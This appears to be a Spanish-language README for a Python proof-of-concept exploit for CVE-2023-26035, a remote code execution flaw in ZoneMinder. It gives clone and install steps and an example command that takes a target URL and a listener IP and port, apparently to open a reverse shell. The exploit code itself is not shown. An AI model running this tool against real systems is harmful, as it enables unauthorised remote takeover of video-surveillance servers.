
Este es un script escrito en Python que permite la explotación de la falla de seguridad de Zoneminder descrita en CVE-2023-26035.
Este es un script escrito en Python que permite la explotación de la falla de seguridad de Zoneminder descrita en CVE-2023-26035. El sistema es vulnerable en versiones anteriores a 1.36.33 y 1.37.33.
Clona el repositorio en tu máquina e instala las dependencias usando pip (se recomienda usar virtualenv para crear un entorno que separe estas instalaciones de las globales)
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
El script necesita la URL objetivo con la ruta raíz de Zoneminder (como http://example.com/zm, http://example.com o http://example.com/zoneminder) , la IP o dominio de la máquina objetivo a la que conectarse y el puerto de la máquina objetivo al que conectarse. Aquí hay un ejemplo:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443
